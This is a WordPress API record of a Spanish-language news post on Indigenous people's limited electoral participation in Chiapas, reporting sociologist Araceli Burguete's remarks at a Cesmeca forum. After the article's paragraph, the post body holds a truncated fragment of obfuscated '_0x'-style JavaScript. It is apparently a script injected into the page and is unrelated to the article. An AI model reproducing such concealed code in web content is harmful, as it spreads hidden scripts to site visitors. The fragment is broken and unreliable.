{"id":12851,"date":"2023-11-25T05:03:46","date_gmt":"2023-11-25T05:03:46","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12851"},"modified":"2023-11-25T05:03:46","modified_gmt":"2023-11-25T05:03:46","slug":"indigenas-sin-verdadera-participacion-en-elecciones","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12851","title":{"rendered":"Ind\u00edgenas sin verdadera participaci\u00f3n en elecciones"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"479\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1700888490217.jpg\" alt=\"\" class=\"wp-image-12852\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1700888490217.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1700888490217-300x187.jpg 300w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores. 24 de noviembre del 2023. Tuxtla Guti\u00e9rrez.-De acuerdo con la doctora en Ciencias Pol\u00edticas y Sociales, Araceli Burguete Cal y Mayor, expuso que la poblaci\u00f3n ind\u00edgena, no ha logrado que sus derechos, en el debate electoral, sean reconocidos en sentido estricto.Record\u00f3 que, se va a ir a elecciones, en un nuevo esfuerzo, despu\u00e9s de una consulta y nuevas delimitaciones, saber qui\u00e9n es una persona ind\u00edgena es un debate no resuelto; ahora se dice que deben de ser hablantes de la lengua ind\u00edgena, pero y ah\u00ed es donde la cosa se ensancha tanto que termina siendo vac\u00eda, porque ponen criterios como la validaci\u00f3n de una autoridad.En el &#8220;VII Foro Social sobre Democracias Otras&#8221;, del Centro de Estudios Superiores de M\u00e9xico y Centroam\u00e9rica (Cesmeca), la soci\u00f3loga resalt\u00f3 que los acuerdos de San Andr\u00e9s de 1996, plantean, entre otras cosas, el reconocimiento a la autonom\u00eda en 2 ejes: el de fortalecer su representaci\u00f3n pol\u00edtica y las legislaturas; y el gobierno propio. Los cuales quedaron materializados hasta el 2001 en la redistribuci\u00f3n electoral, que gracias a luchas legislativas, con el tiempo, quedaron delimitados como distritos electorales ind\u00edgenas aquellos que ten\u00edan m\u00e1s del 40% de hablantes de poblaci\u00f3n ind\u00edgena.El Instituto Nacional Electoral, subray\u00f3 a los partidos pol\u00edticos, postular candidatos ind\u00edgenas, \u201cel problema antes y ahora, esta en la complejidad de definir qui\u00e9n jur\u00eddicamente es una persona ind\u00edgena\u201d. Ejemplific\u00f3 con el Distrito Local 5 de San Cristobal de Las Casas, al cual le corresponde una persona ind\u00edgena, sin embargo, no pas\u00f3 \u201clos c\u00e1nones de la teor\u00eda\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 24 de noviembre del 2023. Tuxtla Guti\u00e9rrez.-De acuerdo con la doctora en Ciencias Pol\u00edticas y Sociales, Araceli Burguete Cal y Mayor, expuso que la poblaci\u00f3n ind\u00edgena, no ha logrado que sus derechos, en el debate electoral, sean reconocidos en sentido estricto.Record\u00f3 que, se va a ir a elecciones, en un nuevo esfuerzo, despu\u00e9s &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12852,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-12851","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12851","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12851"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12851\/revisions"}],"predecessor-version":[{"id":12853,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12851\/revisions\/12853"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12852"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12851"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12851"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12851"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}